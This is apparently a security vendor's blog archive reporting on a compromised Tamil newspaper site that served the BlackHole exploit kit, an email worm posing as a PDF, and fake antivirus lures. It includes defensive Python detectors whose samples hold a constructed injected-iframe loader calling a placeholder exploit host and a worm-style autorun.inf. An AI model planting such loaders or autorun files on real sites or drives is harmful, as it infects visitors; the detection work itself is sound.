Archive for the ‘Breaking’ Category

-... .-.. .- -.-. -.- .... --- .-.. .

Wednesday, May 2nd, 2012

“Dhina Thanthi” (“Daily Telegraph” in English) is a popular Tamil newspaper whose online service runs on the domain dailythanthi.com. This site has been compromised.

A page hosting model/practice question papers, meant to aid students who are about to sit their board examinations in the state of Tamil Nadu, has been infected with JavaScript that in turn loads the BlackHole exploit kit. The kit tries a cocktail of vulnerabilities across Windows, Java, some Adobe products, etc.

The page contains a JavaScript that in turn contacts the exploit server.

Above are network captures of the dailythanthi site connecting to the exploit server.

The script was unpacked, thanks to JSUnpack, and we were able to see the iframe that leads to the exploit server.
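The two things the analysis above relies on, a hidden iframe pointing off-site and an inline script that decodes and writes it, can be triaged statically. The script below is an added example written for this post, not code from K7 or from the compromised site: it parses a constructed HTML page (placeholder hostnames such as exploit-host.example are assumptions, not the real exploit server) and reports zero-size or hidden iframes whose host differs from the page's host, inline scripts that combine eval/unescape/document.write calls, and any iframe source that becomes visible once the script's percent-encoded literals are decoded.

```python
import re
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# Constructed sample page (placeholder hostnames): a question-paper page carrying an
# injected script that writes out a hidden iframe, plus a static zero-size iframe.
SAMPLE_HTML = """<html><head><title>Model Question Papers</title></head>
<body>
<h1>Practice papers</h1>
<a href="/papers/maths.pdf">Maths</a>
<iframe src="http://news-site.example/ad.html" width="300" height="250"></iframe>
<script type="text/javascript">
var d = eval(unescape('%64%6f%63%75%6d%65%6e%74'));
document.write(unescape('%3Ciframe src="http://exploit-host.example/in.php" width=1 height=1 style="visibility:hidden"%3E%3C/iframe%3E'));
</script>
<iframe src="http://exploit-host.example/main.php" width="0" height="0" frameborder="0"></iframe>
</body></html>
"""

# Calls that, seen together in one inline script, usually mean a packed loader.
OBFUSCATION = re.compile(r"\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(")
IFRAME_SRC = re.compile(r"<iframe[^>]*?\ssrc=[\"']?([^\"'\s>]+)", re.I)


class _Collector(HTMLParser):
    """Collects <iframe> attribute sets and inline <script> bodies from a page."""

    def __init__(self):
        super().__init__()
        self.iframes = []
        self.scripts = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag == "iframe":
            self.iframes.append(dict(attrs))
        elif tag == "script":
            self._in_script = True
            self._buf = []

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self.scripts.append("".join(self._buf))
            self._in_script = False

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)


def _tiny(value):
    """True for width/height attributes of 0 or 1 pixel."""
    try:
        return float(str(value).rstrip("px")) <= 1
    except ValueError:
        return False


def _is_hidden(attrs):
    style = (attrs.get("style") or "").replace(" ", "").lower()
    return (_tiny(attrs.get("width")) or _tiny(attrs.get("height"))
            or "display:none" in style or "visibility:hidden" in style)


def _offsite(src, page_host):
    host = urlparse(src).hostname
    return bool(host) and host != page_host


def scan_page(html, page_url):
    """Return a list of findings for a fetched page; an empty list means nothing suspicious."""
    page_host = urlparse(page_url).hostname
    collector = _Collector()
    collector.feed(html)
    findings = []
    for attrs in collector.iframes:
        src = attrs.get("src", "")
        if _is_hidden(attrs) and _offsite(src, page_host):
            findings.append({"type": "hidden_iframe", "src": src})
    for body in collector.scripts:
        calls = sorted(set(OBFUSCATION.findall(body)))
        if len(calls) >= 2:
            # Decode %XX literals the way unescape() would, to see what gets written out.
            for match in IFRAME_SRC.finditer(unquote(body)):
                findings.append({"type": "script_written_iframe", "src": match.group(1)})
            findings.append({"type": "obfuscated_script", "calls": calls})
    return findings


if __name__ == "__main__":
    for finding in scan_page(SAMPLE_HTML, "http://news-site.example/papers.html"):
        print(finding)
```

The visible 300x250 iframe on the same host is deliberately left alone, since on a news site that is what an advert looks like; the heuristic only fires when size or style hides the frame and the source is another host.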

These servers haven’t been updated of late, hence there was no infection to be acquired. But the Daily Thanthi site still remains compromised.

There are several such domain names hosted on a single IP.

Note the “robots.txt” in the above screenshot of the exploit server’s domain directory. It is there to stop any search bots that stumble upon this domain from indexing it.

As for K7 users, keeping your site blocker up to date will keep threats such as this at bay.

When the administrator of the domain listed in the WhoIs records was contacted, we received only a mailer-daemon response. We then contacted the administrators of the company (interpressindia.com) that maintains the dailythanthi.com site; again it was a mailer-daemon.

As a footnote, if you were wondering what the blog title meant, it is BlackHole written in Morse code.

Kaarthik
K7 TCL


Old style Email Worm spreading rapidly

Saturday, September 11th, 2010

In something of a blast from the past, an email borne worm has been sighted spreading around the internet.

Although we’ve not seen too many actual attacks from this, it’s been widely reported in the media, perhaps as it’s quite a novelty these days to see a worm spreading in this way.

It spreads itself as an executable attached to email, but disguises itself as a PDF file. When executed it attempts to download other malicious files onto the victim machine, and drops some files in an attempt to let the worm spread via autorun.
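Both tricks described above, an executable dressed up as a PDF and an autorun.inf planted on removable media, are easy to catch by looking at content rather than names. The following is an added example (not K7's detection code, and the sample bytes and autorun.inf are constructed for illustration): it compares an attachment's magic bytes with the extension it claims, flags double extensions that hide an executable behind a document suffix, and lists what an autorun.inf would launch.

```python
import configparser

PE_MAGIC = b"MZ"          # start of any Windows executable
PDF_MAGIC = b"%PDF-"      # start of a real PDF
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "jpg"}
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd"}

# Constructed samples: a fake PE header and a real-looking PDF header.
FAKE_PE = b"MZ\x90\x00" + b"\x00" * 60
FAKE_PDF = b"%PDF-1.4\n%constructed sample\n"

# Constructed autorun.inf of the kind a worm drops to spread via removable drives.
SAMPLE_AUTORUN = r"""
[autorun]
open=recycler\setup.exe
shellexecute=recycler\setup.exe
action=Open folder to view files
icon=%SystemRoot%\system32\SHELL32.dll,4
"""


def sniff(data):
    """Identify the real content type from the leading bytes."""
    if data.startswith(PE_MAGIC):
        return "pe"
    if data.startswith(PDF_MAGIC):
        return "pdf"
    return "unknown"


def classify_attachment(filename, data):
    """Report why an attachment's name and content disagree, if they do."""
    parts = filename.lower().split(".")
    ext = parts[-1] if len(parts) > 1 else ""
    inner_exts = set(parts[1:-1])          # e.g. {"pdf"} for "statement.pdf.exe"
    kind = sniff(data)
    reasons = []
    if kind == "pe" and ext in DOC_EXTS:
        reasons.append("executable content behind a document extension")
    if ext in EXEC_EXTS and inner_exts & DOC_EXTS:
        reasons.append("double extension hides an executable")
    return {"content": kind, "extension": ext, "reasons": reasons,
            "suspicious": bool(reasons)}


def autorun_targets(inf_text):
    """Return the paths an autorun.inf would execute (open= and shellexecute=)."""
    # interpolation=None so values such as %SystemRoot% are taken literally.
    cp = configparser.ConfigParser(interpolation=None, strict=False)
    cp.read_string(inf_text)
    if not cp.has_section("autorun"):
        return []
    section = cp["autorun"]
    return [section[key] for key in ("open", "shellexecute") if key in section]


if __name__ == "__main__":
    for name, blob in [("Statement.pdf.exe", FAKE_PE), ("statement.pdf", FAKE_PE),
                       ("statement.pdf", FAKE_PDF)]:
        print(name, classify_attachment(name, blob))
    print("autorun launches:", autorun_targets(SAMPLE_AUTORUN))
```

A mail gateway or endpoint script can apply classify_attachment to every attachment regardless of what the icon or name suggests, and any autorun.inf whose open= or shellexecute= points at an executable on the drive itself is worth quarantining before the drive is opened.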

K7 Total Security detects this worm as “Emailworm (0019e4ae1)” (yeah, it’s that uninteresting!)

Full information is here:

http://viruslab.k7computing.com/index.php?option=com_k7virus&view=showvirus&Itemid=1&id=818

If you’re interested in more, Dan Goodin has written a short piece about the worm on The Register: http://www.theregister.co.uk/2010/09/10/email_worm_spreading/

Andrew Lee
CTO K7 Computing


Fake Swamis and Fake AVs

Saturday, March 6th, 2010

The folks who are in the business of malware are quite innovative and react with alacrity to what is happening around the world.

In recent times, the quake in Haiti was used as a lever to ask people to visit a link to help. Of course, if a mail is well-crafted we tend to see how we can help, and then the usual means of exploiting are used, ranging from asking you to make a ‘small’ donation with your credit card to stealthily making you download malware.

If you are from Chennai, Tamil Nadu (INDIA), you will be aware of a sleazy scandal involving a fake godman. To cut a long story short, the young godman was caught on tape in very compromising acts with a yesteryear actress; it would have been nobody’s business but for the godman’s usual preaching about celibacy and how he had achieved ‘powers’ through the practice of the same.

Anyway, our interest is the fact that currently, if you search for the names of the people involved, you are directed to pages that host fake anti-virus products.

So beware of fake swamijis and fake AVs!

Cool Rahul

Monday, January 25th, 2010

Cool Rahul

The name probably brings to mind a Hindi movie or a school nickname. Well, it is Indian alright. But it is a rarity: a piece of malware that originated in India. (more…)